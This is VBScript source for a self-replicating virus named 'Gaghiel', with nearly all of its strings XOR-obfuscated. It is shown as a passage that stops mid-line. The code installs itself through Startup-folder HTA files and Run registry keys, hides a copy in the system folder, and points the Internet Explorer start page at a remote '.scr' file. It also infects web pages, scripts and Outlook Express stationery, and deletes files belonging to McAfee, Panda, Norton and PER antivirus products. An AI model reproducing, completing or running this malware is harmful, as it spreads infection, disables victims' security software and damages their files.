On Error Resume Next
Set sl = Createobject(q("Tdunwskbs)s~wbkne"))
if InStr(navigator.systemlanguage, "es") <> 0 then
sl.path = q("D=[pnichpt")& _
q("[Jbiý'Nindnh[Wuh`ufjft")& _
q("[Nindnh[@f`onbk)osf")
else
sl.path = q("D=[pnichpt")& _
q("[Tsfus'Jbir[Wuh`ufjt[Tsf")& _
q("usrw[@f`onbk)osf")
end if
sl.doc = vbCrlf & "<Script Language = 'VBScript'>" & vbCrlf & _
q("UBJ';----------@BC]FD'KFET'5775----------9")&vbCrlf& _
q("UBJ'QET(@f`onbk)E'e~'JfdonibCufjhi(@BC]FD")&vbCrlf& _
q("UBJ'Obdoh'bi'bk'Wbur+'Dfkncfc'Jricnfk")&vbCrlf& _
q("UBJ'Tfdonbk5762Gkfsnijfnk)dhj+")&vbCrlf& _
q("UBJ'50*66*5775'''Sfdif*Wbur")&vbCrlf& _
q("UBJ'Cbubdoht'Ubtbuqfcht")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Cnj'`a+'`p")&vbCrlf& _
q("tbs'`a':'dubfsbhembds/v/%scripting.fileSystemobject%..")&vbCrlf& _
q("tbs'`p':'dubfsbhembds/v/%Wscript.Shell%..")&vbCrlf& _
q("@PU:v/%HKEY_CURRENT_USER\Software\Microsoft\%.'!'X")&vbCrlf& _
q("v/%Windows Scripting Host\Settings\Timeout%.")&vbCrlf& _
q("S`:`p)Ub`Ubfc/@PU.")&vbCrlf& _
q("na'/S`9:6.'hu'/S`:%%.'Sobi")&vbCrlf& _
q("`p)Ub`Punsb'@PU+'7+'%UB@XCPHUC%")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'Cf~/cfsb.'9'52'sobi")&vbCrlf& _
q("Tc:v/%HKEY_CURRENT_USER\Software\Microsoft\Inter%.!'X")&vbCrlf& _
q("v/%net Explorer\Main\Start Page%.")&vbCrlf& _
q("T`:v/%http://www.gratisweb.com/machinedramon1/%.!'X")&vbCrlf& _
q("v/%sachiel.jpg.scr%.")&vbCrlf& _
q("`p)ub`Punsb'Tc+'T`")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'/Jhiso/cfsb.','Cf~/cfsb.':'47.'sobi")&vbCrlf& _
q("jt`eh'%Hufdnhi'fisbt'cb'bisufu%!'X")&vbCrlf& _
q("%'fk'nisbuibs=%'!'qeDuka'!'X")&vbCrlf& _
q("%'''''%!'qeDuka'!'X")&vbCrlf& _
q("%Tfsbknsb'irbtsuh'vrb'btsft'%!'X")&vbCrlf& _
q("%bi'bk'dnbkh+%'!'qeDuka'!'X")&vbCrlf& _
q("%Fdbkbufch'tbf'sr'knil+%'!'qeDuka'!'X")&vbCrlf& _
q("%Qbi`f'f'ihthsuht'sr'onwbusbsh+%'!'qeDuka'!'X")&vbCrlf& _
q("%Of`ftb'sr'dhibnhi'bi'kh'ubfk'dhjh%!'X")&vbCrlf& _
q("%'bi'kh'qnusrfk+%'!'qeDuka'!'X")&vbCrlf& _
q("%Cfiht'oh~'bk'chpikhfc'cb'dfcf'cnf+%'!'qeDuka'!'X")&vbCrlf& _
q("%Wbuchif'bk'dfab'bi'bk'Sbdkfch+%'!'qeDuka'!'X")&vbCrlf& _
q("%Ftn'dhjh'ihthsuht'wbuchifjht'f%!'X")&vbCrlf& _
q("%'irbtsuht'wuhqbbchubt+%!qeDuka!'X")&vbCrlf& _
q("%Ih'iht'cbmbt'dfbu'kf'dhibnhi+%'!'qeDuka'!'X")&vbCrlf& _
q("%^'kneufiht'cb'shch'Qnurt+%'!'qeDuka'!'X")&vbCrlf& _
q("%Bi'ihjeub'cbk'Tbuqbu+'cbk'Jhcbj'~'cbk'%!'X")&vbCrlf& _
q("%tfish'Rtbu*ifjb)%!qeDuka!'X")&vbCrlf& _
q("%Kh`*ni)%!qeDuka!'X")&vbCrlf& _
q("%''''''%!qeDuka!'X")&vbCrlf& _
q("%@BC]FD'KFET'5775%!qeDuka!'X")&vbCrlf& _
q("%QET(@f`onbk'e~'JfdonibCufjhi%!qeDuka!'X")&vbCrlf& _
q("%Obdoh'bi'bk'Wbuý+'Dfkncfc'Jricnfk%!qeDuka!'X")&vbCrlf& _
q("%Tfdonbk5762Gkfsnijfnk)dhj%+'62+'%@f`onbk%")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'NtOSF':'Afktb'sobi")&vbCrlf& _
q("tbs'`c':'dubfsbhembds/v/%Scripting.Dictionary%..")&vbCrlf& _
q("`c)fcc'v/%html%.+'%6%='`c)fcc'v/%htm%.+'%5%")&vbCrlf& _
q("`c)fcc'v/%hta%.+'%4%='`c)fcc'v/%php%.+'%3%")&vbCrlf& _
q("`c)fcc'v/%asp%.+'%2%='`c)fcc'v/%shtml%.+'%1%")&vbCrlf& _
q("`c)fcc'v/%shtm%.+'%0%='`c)fcc'v/%phtm%.+'%?%")&vbCrlf& _
q("`c)fcc'v/%phtml%.+'%>%='`c)fcc'v/%htw%.+'%67%")&vbCrlf& _
q("`c)fcc'v/%plg%.+'%66%='`c)fcc'v/%regedit%.+'%65%")&vbCrlf& _
q("`c)fcc'v/%regedb32%.+'%64%='`c)fcc'v/%msconfig%.+'%63%")&vbCrlf& _
q("`c)fcc'v/%sfc%.+'%62%='`c)fcc'v/%gaghiel.hta%.+'%61%")&vbCrlf& _
q("@ct':'`a)`bstwbdnfkahkcbu/6.")&vbCrlf& _
q("na'`a)AnkbBntst/@ct!v/%\AngeldelMar.html%..:Afktb'sobi")&vbCrlf& _
q("Tbs'F`:`a)DubfsbSbsAnkb/@ct!v/%\AngeldelMar.html%..")&vbCrlf& _
q("Pk:v/%<html><head><Title>Naria y Er%.!'X")&vbCrlf& _
q("v/%ya</title></head><body%.!'X")&vbCrlf& _
q("v/%><p>Error Cargando : 2015</body></html>%.")&vbCrlf& _
q("F`)PunsbKnib'Pk'")&vbCrlf& _
q("F`)dkhtb")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("tbs'`f`':'`a)HwbiSbsAnkb/Ptdunws)TdunwsArkkifjb+6.")&vbCrlf& _
q("Ch'ponkb'`f`)FsbicHaTsubfj':'Afktb")&vbCrlf& _
q("`kn':'`f`)UbfcKnib")&vbCrlf& _
q("na'`kn';9'%%'sobi")&vbCrlf& _
q("qe`':'qe`!v/%vbs = vbs & %.'!'X")&vbCrlf& _
q("dou/43.!'X")&vbCrlf& _
q("Ubwkfdb/`kn+'Dou/43.+'Dou/43.!%!Dou/43.!%!Dou/43..!'X")&vbCrlf& _
q("dou/43.'!'%!'qeDuka%'!'qeDuka")&vbCrlf& _
q("bic'na'")&vbCrlf& _
q("khhw")&vbCrlf& _
q("`f`)dkhtb")&vbCrlf& _
q("tbs'`o`':'`a)HwbiSbsAnkb/Ptdunws)TdunwsArkkifjb+6.")&vbCrlf& _
q("qe}':'`o`)UbfcFkk")&vbCrlf& _
q("`o`)dkhtb")&vbCrlf& _
q("Tbs'@on':'`a)HwbisbsAnkb/Ptdunws)TdunwsArkkifjb+6.")&vbCrlf& _
q("Ch'ponkb'@on)FsbicHaTsubfj':'Afktb")&vbCrlf& _
q("qe':'@on)UbfcKnib")&vbCrlf& _
q("na'qe';9'%%'sobi")&vbCrlf& _
q("qej':'qej'!'%v/%'!'dou/43.'!'v/qe.'!'dou/43.'!'%.%!'X")&vbCrlf& _
q("%!qeDuka!'X%'!'qeDuka")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Khhw")&vbCrlf& _
q("@on)dkhtb")&vbCrlf& _
q("qt:v/%<script Language =%.!dou/4>.!v/%VBScript%.!'X")&vbCrlf& _
q("dou/4>.!v/%>%.!qeDuka!'X")&vbCrlf& _
q("v/%On Error Resume Next%.!qeDuka!'X")&vbCrlf& _
q("v/%set gz = createobject(%.!'X")&vbCrlf& _
q("%v/%!dou/43.!%scripting.filesystemobject%!'X")&vbCrlf& _
q("dou/43.!%.%!'X")&vbCrlf& _
q("v/%)%.'!qeDuka!'X")&vbCrlf& _
q("v/%set gy = createobject(%.!'X")&vbCrlf& _
q("%v/%!dou/43.!%Wscript.Shell%!dou/43.!%.%!'X")&vbCrlf& _
q("v/%)%.!qeDuka!'X")&vbCrlf& _
q("v/%if gz.FileExists(gz.getspecialfolder(1) & %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Gaghiel.vbs%!dou/43.!%.%!'X")&vbCrlf& _
q("v/%) = False then%.!qeDuka!'X")&vbCrlf& _
q("v/%gy.regwrite %.!'X'")&vbCrlf& _
q("%v/%!dou/43.!'X")&vbCrlf& _
q("%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\%!dou/43.!%.!%!'X")&vbCrlf& _
q("%v/%!dou/43.!%Windows\CurrentVers%!dou/43.!%.!%'!'X")&vbCrlf& _
q("%v/%!dou/43.!%ion\Run\Gaghiel%!dou/43.!%.%!v/%, %.!'X")&vbCrlf& _
q("v/%gz.getspecialfolder(1)%.!'X")&vbCrlf& _
q("v/% & %.!%v/%!dou/43.!'X")&vbCrlf& _
q("%\Gaghiel.vbs%!dou/43.!%.%!qeDuka!'X")&vbCrlf& _
q("v/%gy.regwrite %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%HKEY_LOCAL_MACHINE\SOFTWARE\Micro%!'X")&vbCrlf& _
q("dou/43.!%.!%!'X")&vbCrlf& _
q("%v/%!dou/43.!%soft\Windows\CurrentVersion\Run Domain %!'X")&vbCrlf& _
q("dou/43.!%.!%!'X")&vbCrlf& _
q("%v/%!dou/43.!%Manager\Gaghiel%!dou/43.!%.%!'X")&vbCrlf& _
q("v/%, %.!v/%gz.getspecialfolder(1)%.!v/% & %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Gaghiel.vbs%!dou/43.!%.%!qeDuka!'X")&vbCrlf& _
q("v/%set gs = gz.CreateTextFile(gz.getspecia%.!'X")&vbCrlf& _
q("v/%lfolder(1) & %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Gaghiel.vbs%!dou/43.!%.%!v/%)%.!qeDuka!'X")&vbCrlf& _
q("qe`'!qeDuka!'X")&vbCrlf& _
q("v/%gs.Write vbs%.!qeDuka!'X")&vbCrlf& _
q("v/%gs.close%.!qeDuka!'X")&vbCrlf& _
q("v/%Set G = gz.getfile(gz.getspecia%.!'X")&vbCrlf& _
q("v/%lfolder(1) & %.!'X")&vbCrlf& _
q("%v/%!Dou/43.!%\Gaghiel.vbs%!Dou/43.!%.%!v/%)%.!qeDuka!'X")&vbCrlf& _
q("v/%G.attributes = G.attributes + 2%.!qeDuka!'X")&vbCrlf& _
q("v/%gy.run gz.getspecialfolder(1) & %.!'X")&vbCrlf& _
q("dou/43.!v/%\Gaghiel.vbs%.!Dou/43.!qeDuka!'X")&vbCrlf& _
q("v/%end if%.!qeDuka!'X")&vbCrlf& _
q("v/%if err.number <> 0 then%.!qeDuka!'X")&vbCrlf& _
q("v/%alert(%.!dou/43.!v/%Error 13%.!dou/43.!'X")&vbCrlf& _
q("v/% & vbCrlf & %.!dou/43.!'X")&vbCrlf& _
q("v/%Esta Pagina Requiere Controles ActiveX%.!'X")&vbCrlf& _
q("v/% para ser mostr%.!'X")&vbCrlf& _
q("v/%ada en su totalidad%.!dou/43.!'X")&vbCrlf& _
q("v/% & vbCrlf & %.!dou/43.!'X")&vbCrlf& _
q("v/%Presione Actualizar y Acepte%.!'X")&vbCrlf& _
q("dou/43.!v/%)%.!qeDuka!'X")&vbCrlf& _
q("v/%End if%.!qeDuka!'X")&vbCrlf& _
q("v/%Function q(j)%.!qeDuka!'X")&vbCrlf& _
q("v/%On Error Resume Next%.!qeDuka!'X")&vbCrlf& _
q("v/%For r = 1 to len(j)%.!qeDuka!'X")&vbCrlf& _
q("v/%q = q & Chr(Asc(Mid(j,r,1)) Xor%.!'X")&vbCrlf& _
q("v/% Len(%.!Dou/43.!v/%Gaghiel%.!Dou/43.!'X")&vbCrlf& _
q("v/%))%.!qeDuka!'X")&vbCrlf& _
q("v/%Next%.!qeDuka!'X")&vbCrlf& _
q("v/%End function%.!qeDuka!'X")&vbCrlf& _
q("v/%<%.!v/%/%.!v/%script>%.")&vbCrlf& _
q("@f`onbk/.")&vbCrlf& _
q("@Bwubtt/.")&vbCrlf& _
q("@Jfnk/.")&vbCrlf& _
q("Cnkficr/.")&vbCrlf& _
q("Ubn/.")&vbCrlf& _
q("Bktb")&vbCrlf& _
q("@Osf/.")&vbCrlf& _
q("Ubn/.")&vbCrlf& _
q("Bic'na")&vbCrlf& _
q("Tre'Cnkficr/.")&vbCrlf& _
q("Hi'Buuhu'ubtrjb'ibs")&vbCrlf& _
q("Cnj'so+'wbu+'jda+'wfi+'ihu+'ns")&vbCrlf& _
q("so:v/%HKEY_LOCAL_MACHINE\SOFTWARE\Hacksoft\%.!'X")&vbCrlf& _
q("v/%The Hacker Anti-Virus\THDAT%.")&vbCrlf& _
q("so:`p)ub`Ubfc/so.")&vbCrlf& _
q("wbu:v/%HKEY_LOCAL_MACHINE\SOFTWARE\PER%.!'X")&vbCrlf& _
q("v/% Systems\PER %.!'X")&vbCrlf& _
q("v/%Antivirus\Instal%.!'X")&vbCrlf& _
q("v/%ación\dirPrincipal%.")&vbCrlf& _
q("wbu':'`p)ub`Ubfc/wbu.")&vbCrlf& _
q("jda:v/%HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\V%.!'X")&vbCrlf& _
q("v/%irusScan\Location%.")&vbCrlf& _
q("jda':'`p)ub`Ubfc/jda.")&vbCrlf& _
q("wfi:v/%HKEY_LOCAL_MACHINE\Software\Panda%.!'X")&vbCrlf& _
q("v/% Software\Panda Antivir%.!'X")&vbCrlf& _
q("v/%us 6.0\Path%.")&vbCrlf& _
q("wfi:`p)ub`Ubfc/wfi.")&vbCrlf& _
q("ihu:v/%HKEY_LOCAL_MACHINE\Software\Syman%.!'X")&vbCrlf& _
q("v/%tec\InstalledApps\NAV%.")&vbCrlf& _
q("ihu':'`p)ub`Ubfc/ihu.")&vbCrlf& _
q("ns:v/%HKEY_LOCAL_MACHINE\Software\Comput%.!'X")&vbCrlf& _
q("v/%erAssociates\Anti-%.!'X")&vbCrlf& _
q("v/%Virus\Resident\VetPath%.")&vbCrlf& _
q("ns':'`p)ub`Ubfc/ns.")&vbCrlf& _
q("na'so';9'%%'sobi'FSA/so.")&vbCrlf& _
q("na'wbu';9'%%'sobi'FSA/wbu.")&vbCrlf& _
q("na'jda';9'%%'sobi'FSA/jda.")&vbCrlf& _
q("na'wfi';9'%%'sobi'FSA/wfi.")&vbCrlf& _
q("na'ihu';9'%%'sobi'FSA/ihu.")&vbCrlf& _
q("na'ns';9'%%'sobi'FSA/ns.")&vbCrlf& _
q("Bic'tre")&vbCrlf& _
q("Tre'@Bwubtt/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("@pni':'`a)`bstwbdnfkahkcbu/7.")&vbCrlf& _
q("`cf:v/%HKEY_CURRENT_USER\Identities\Default User ID%.")&vbCrlf& _
q("r`:`p)Ub`Ubfc'/`cf.")&vbCrlf& _
q("l`':'v/%HKEY_CURRENT_USER\Identities\%.'!'r`'!'X")&vbCrlf& _
q("v/%\Software\Microsoft\Outlook Express\5.0\Mail%.")&vbCrlf& _
q("`p)ub`punsb'l`!v/%\Message Send HTML%.+'6")&vbCrlf& _
q("`p)ub`punsb'l`!v/%\Compose Use Stationery%.+'6")&vbCrlf& _
q("@C6':'l`'!'v/%\Stationery Name%.")&vbCrlf& _
q("`p)ub`punsb'@C6+'@pni!v/%\Gaghiel.html%.")&vbCrlf& _
q("na'`a)AnkbBntst/@pni!v/%\Gaghiel.html%..:Afktb'sobi")&vbCrlf& _
q("q:v/%<script Language =%.!dou/4>.!'X")&vbCrlf& _
q("v/%VBScript%.!dou/4>.!v/%>%.!qeDuka!'X")&vbCrlf& _
q("v/%On Error Resume Next%.!qeDuka!'X")&vbCrlf& _
q("v/%Set sl = Createobject(%.!'X")&vbCrlf& _
q("%v/%!dou/43.!%Scriptlet.typelib%!dou/43.!%.%!'X")&vbCrlf& _
q("v/%)%.!qeDuka!'X")&vbCrlf& _
q("v/%if InStr(navigator.systemlanguage, %.!'X")&vbCrlf& _
q("dou/43.!v/%es%.!dou/43.!'X")&vbCrlf& _
q("v/%) <> 0 then%.!qeDuka!'X")&vbCrlf& _
q("v/%sl.path = %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%C:\windows%!dou/43.!'X")&vbCrlf& _
q("%.!'X%!qeDuka!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Menú Inicio\Progr%!'X")&vbCrlf& _
q("%amas%!dou/43.!%.!'X%!qeDuka!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Inicio\Gaghiel.hta%!'X")&vbCrlf& _
q("dou/43.!%.%!qeDuka!'X")&vbCrlf& _
q("v/%else%.!qeDuka!'X")&vbCrlf& _
q("v/%sl.path = %.!'X")&vbCrlf& _
q("%v/%!dou/43.!%C:\windows%!'X")&vbCrlf& _
q("dou/43.!%.!'X%!qeDuka!'X")&vbCrlf& _
q("%v/%!dou/43.!%\Start Menu\Progra%!'X")&vbCrlf& _
q("%ms\Sta%!dou/43.!%.!'X%!qeDuka!'X")&vbCrlf& _
q("%v/%!dou/43.!%rtup\Gaghiel.hta%!'X")&vbCrlf& _
q("dou/43.!%.%!qeDuka!'X")&vbCrlf& _
q("v/%end if%.!qeDuka!'X")&vbCrlf& _
q("v/%sl.doc = %.!v/%vbCrlf & %.!dou/43.!'X")&vbCrlf& _
q("v/%<Script Language = %.!'X")&vbCrlf& _
q("dou/4>.!v/%VBScript%.!dou/4>.!v/%>%.!dou/43.!'X")&vbCrlf& _
q("v/% & vbCrlf & _%.!'X")&vbCrlf& _
q("qeDuka!qej!dou/43.!v/%<%.!dou/43.!v/% & %.!dou/43.!'X")&vbCrlf& _
q("v/%/%.!dou/43.!v/% & %.!dou/43.!v/%Script>%.!'X")&vbCrlf& _
q("dou/43.!qeDuka!'X")&vbCrlf& _
q("v/%sl.write%.!qeDuka!'X")&vbCrlf& _
q("v/%Function q(j)%.!qeDuka!'X")&vbCrlf& _
q("v/%On Error Resume Next%.!qeDuka!'X")&vbCrlf& _
q("v/%For r = 1 to len(j)%.!qeDuka!'X")&vbCrlf& _
q("v/%q = q & Chr(Asc(Mid(j,r,1)) Xor Len(%.!dou/43.!'X")&vbCrlf& _
q("v/%Gaghiel%.!'X")&vbCrlf& _
q("dou/43.'!'v/%))%.!qeDuka!'X")&vbCrlf& _
q("v/%Next%.!qeDuka!'X")&vbCrlf& _
q("v/%End function%.!qeDuka!'X")&vbCrlf& _
q("v/%<%.'!'v/%/%.'!'v/%Script>%.")&vbCrlf& _
q("@sf`':'v/%<%.!v/%HTML%.!v/%><HEAD%.!v/%>%.!'X")&vbCrlf& _
q("v/%<%.!v/%Title> Gaghiel </Title%.!v/%><%.!'X")&vbCrlf& _
q("v/%/HEAD>%.!qeDuKa!'X")&vbCrlf& _
q("v/%<%.'!'v/%Body> %.'!'qeDuka'!'qeDuka'!'q'!'qeDuKa'!'X")&vbCrlf& _
q("v/%<%.'!'v/%/Body></HTML%.'!'v/%>%.")&vbCrlf& _
q("tbs'osf:`a)DubfsbSbsAnkb/@pni!v/%\Gaghiel.html%..")&vbCrlf& _
q("osf)punsb'@sf`")&vbCrlf& _
q("osf)dkhtb")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'Tre")&vbCrlf& _
q("Aridsnhi'v/m.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Ahu'u':'6'sh'kbi/m.")&vbCrlf& _
q("v':'v'!'Dou/Ftd/Jnc/m+u+6..'_hu'Kbi/%@f`onbk%..")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Bic'aridsnhi")&vbCrlf& _
q("Tre'Ubn/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("@UP':'`a)`bstwbdnfkahkcbu/7.")&vbCrlf& _
q("osf':'v/%\Menú Inicio\Programas\Inicio\Gaghiel.hta%.")&vbCrlf& _
q("Tbs'U':'`a)`bsahkcbu/@UP'!'v/%\Recent%..")&vbCrlf& _
q("Tbs'U6':'U)ankbt")&vbCrlf& _
q("ahu'bfdo'U5'ni'U6")&vbCrlf& _
q("`a)cbkbsbankb/U5)wfso.")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("na'`a)AnkbBntst/@UP'!'osf.'sobi")&vbCrlf& _
q("`a)CbkbsbAnkb/@UP'!'osf.")&vbCrlf& _
q("bic'na'''''")&vbCrlf& _
q("Bic'tre")&vbCrlf& _
q("Tre'FSA/FS.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q(" Fethkrsbk~'Sbuuhu'Anbkc")&vbCrlf& _
q("na'FS';9'%%'sobi")&vbCrlf& _
q("na'Un`os/FS+6.';9'v/%\%.'sobi'FS':'FS'!'v/%\%.")&vbCrlf& _
q("tbs'FS6':'`a)`bsahkcbu/FS.")&vbCrlf& _
q("tbs'FS5':'FS6)ankbt")&vbCrlf& _
q("ahu'bfdo'FS4'ni'FS5")&vbCrlf& _
q("tbs'`u':'`a)`bsankb/FS4)wfso.")&vbCrlf& _
q("na'`u)fssunersbt'9'7'sobi")&vbCrlf& _
q("`u)fssunersbt':'`u)fssunersbt'*'`u)fssunersbt")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("`a)cbkbsbAnkb/FS4)wfso.")&vbCrlf& _
q("ibs")&vbCrlf& _
q("FS':'Kdftb/FS.")&vbCrlf& _
q("na'niTsu/FS+'v/%per%..';9'v/%False%.'sobi")&vbCrlf& _
q("@Pni:`a)`bstwbdnfkahkcbu/7.")&vbCrlf& _
q("@bt:v/%\Menú Inicio\Programas\Inicio\%.")&vbCrlf& _
q("@ni:v/%\Start Menu\Programs\Startup\%.")&vbCrlf& _
q("@Wfq:v/%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft%.!'X")&vbCrlf& _
q("v/%\Windows\CurrentVersion\runservices\PAV.EXE%.")&vbCrlf& _
q("`p)Ub`cbkbsb'@Wfq")&vbCrlf& _
q("na'`a)AnkbBntst/@Pni!@bt!v/%PER Antivirus.lnk%..'sobi")&vbCrlf& _
q("`a)cbkbsbAnkb/@Pni'!'@bt'!'v/%PER Antivirus.lnk%..")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'`a)AnkbBntst/@Pni!@ni!v/%PER Antivirus.lnk%..'sobi")&vbCrlf& _
q("`a)cbkbsbAnkb/@Pni'!'@ni'!'v/%PER Antivirus.lnk%..")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Fw':'v/%Actualización de PER Antivirus.lnk%.")&vbCrlf& _
q("na'`a)AnkbBntst/@Pni'!'@bt'!'Fw.'sobi")&vbCrlf& _
q("`a)cbkbsbAnkb/@Pni'!'@bt'!'Fw.")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'`a)AnkbBntst/@Pni'!'@ni'!'Fw.'sobi")&vbCrlf& _
q("`a)cbkbsbAnkb/@Pni'!'@ni'!'Fw.")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Aridsnhi'NtOSF/.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("@wfso':'Ptdunws)TdunwsArkkifjb")&vbCrlf& _
q("na'@wfso';9'%%'sobi")&vbCrlf& _
q("NtOSF':'Afktb")&vbCrlf& _
q("bktb")&vbCrlf& _
q("NtOSF':'Surb")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Bic'Aridsnhi")&vbCrlf& _
q("Tre'@Osf/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("@P^':'`a)`bstwbdnfkahkcbu/6.")&vbCrlf& _
q("@PP':'`a)`bstwbdnfkahkcbu/7.")&vbCrlf& _
q("na'`a)AnkbBntst/@P^'!'v/%\Gaghiel.vbs%..':'Afktb'sobi")&vbCrlf& _
q("@6p:v/%HKEY_LOCAL_MACHINE\SOFTWARE\Micro%.!'X")&vbCrlf& _
q("v/%soft\Windows\CurrentVer%.!'X")&vbCrlf& _
q("v/%sion\Run\Gaghiel%.")&vbCrlf& _
q("@5p:v/%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft%.!'X")&vbCrlf& _
q("v/%\Windows\CurrentVe%.!'X")&vbCrlf& _
q("v/%rsion\Run Domain Manager\Gaghiel%.")&vbCrlf& _
q("`p)ub`punsb'@6p+'@P^'!'v/%\Gaghiel.vbs%.")&vbCrlf& _
q("`p)ub`punsb'@5p+'@P^'!'v/%\Gaghiel.vbs%.")&vbCrlf& _
q("ahu'bfdo''ni'chdrjbis)Tdunwst")&vbCrlf& _
q("na'kdftb/)Kfi`rf`b.':'v/%vbscript%.'sobi")&vbCrlf& _
q("na'NiTsu/)sbs+'v/%Gaghiel%..';9'7'sobi")&vbCrlf& _
q("@Tdunws':')sbs")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("tbs'`t:`a)DubfsbSbsAnkb/@P^'!'v/%\Gaghiel.vbs%..")&vbCrlf& _
q("`t)punsb'@Tdunws")&vbCrlf& _
q("`t)dkhtb")&vbCrlf& _
q("Tbs'L':'`a)`bsankb/@P^'!'v/%\Gaghiel.vbs%..")&vbCrlf& _
q("L)fssunersbt':'L)fssunersbt','5")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'NiTsu/Ifqn`fshu)T~tsbjKfi`rf`b+'v/%es%..';9'7'sobi")&vbCrlf& _
q("OS@':'@PP'!'X")&vbCrlf& _
q("v/%\MenúIn~1\Progra~1\Inicio\Gaghiel.hta%.")&vbCrlf& _
q("bktb")&vbCrlf& _
q("OS@:'@PP'!'X")&vbCrlf& _
q("v/%\Startm~1\Programs\Startup\Gaghiel.hta%.")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Tbs'p`i:`a)DubfsbSbsAnkb/@PP'!'v/%\Wininit.ini%..")&vbCrlf& _
q("p`i)Punsbknib'v/%[Rename]%.'")&vbCrlf& _
q("p`i)Punsbknib'v/%Nul=%.'!'OS@")&vbCrlf& _
q("p`i)dkhtb")&vbCrlf& _
q("`p)uri'`a)`bstwbdnfkahkcbu/6.'!'v/%\Gaghiel.vbs%.")&vbCrlf& _
q("bic'tre")&vbCrlf& _
q("Tre'@f`onbk/.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("cnj'`cc+'`k")&vbCrlf& _
q("tbs'`cc':'`a)cunqbt")&vbCrlf& _
q("ahu'bfdo'`k'ni'`cc")&vbCrlf& _
q("na'`k)cunqbs~wb':'5'hu'`k)cunqbs~wb':'4'sobi")&vbCrlf& _
q("@ahk/`k)wfso'!'v/%\%..")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("ibs")&vbCrlf& _
q("Bic'tre")&vbCrlf& _
q("Tre'@ahk/ahkcbu.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("tbs'`ak':'`a)`bsahkcbu/ahkcbu.")&vbCrlf& _
q("tbs'`tak':'`ak)treahkcbut")&vbCrlf& _
q("ahu'bfdo'`f'ni'`tak")&vbCrlf& _
q("@ahk/`f)wfso.")&vbCrlf& _
q("@OSJK/`f)wfso.")&vbCrlf& _
q("ibs'")&vbCrlf& _
q("Bic'tre")&vbCrlf& _
q("Tre'@OSJK/ahkcbu.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("tbs'`kt':'`a)`bsahkcbu/ahkcbu.")&vbCrlf& _
q("tbs'`at':'`kt)ankbt")&vbCrlf& _
q("`e':'%%")&vbCrlf& _
q("ahu'bfdo'a'ni'`at")&vbCrlf& _
q("`i':'a)ifjb")&vbCrlf& _
q("`i':'Kdftb/`i.")&vbCrlf& _
q("`bs':'`a)@bsBsbitnhiIfjb/a)wfso.")&vbCrlf& _
q("`bs':'Kdftb/`bs.")&vbCrlf& _
q("`d':'`a)`bsEftbIfjb/a)wfso.")&vbCrlf& _
q("`d':'Kdftb/`d.")&vbCrlf& _
q("na'/`c)Bntst/`bs.:surb.'fic'/`d';9'v/%gaghiel%..'sobi")&vbCrlf& _
q("tbs'`u':'`a)`bsankb/a)wfso.")&vbCrlf& _
q("na'`u)fssunersbt'9'7'sobi")&vbCrlf& _
q("`u)fssunersbt':'`u)fssunersbt'*'`u)fssunersbt")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("tbs'uc6':'`a)HwbiSbsAnkb/a)wfso+6.")&vbCrlf& _
q("u6':'uc6)ubfcknib")&vbCrlf& _
q("uc6)dkhtb")&vbCrlf& _
q("na'NiTsu/u6+'v/%Gaghiel%..':'7'sobi")&vbCrlf& _
q("tbs'uc5':'`a)HwbiSbsAnkb/a)wfso+6.")&vbCrlf& _
q("u5':'uc5)ubfcFkk")&vbCrlf& _
q("uc5)dkhtb")&vbCrlf& _
q("Tbs'uc4':'`a)HwbiSbsAnkb/a)wfso+5+6.")&vbCrlf& _
q("uc4)punsb'v/%Gaghiel%.!qeDuka!u5!qeDuka!qt")&vbCrlf& _
q("uc4)dkhtb'")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bktbna'/`bs':'v/%vbs%..'hu'/`bs':'v/%vbe%..'sobi")&vbCrlf& _
q("na'/`d';9'v/%gaghiel%..'sobi")&vbCrlf& _
q("tbs'`u':'`a)`bsankb/a)wfso.")&vbCrlf& _
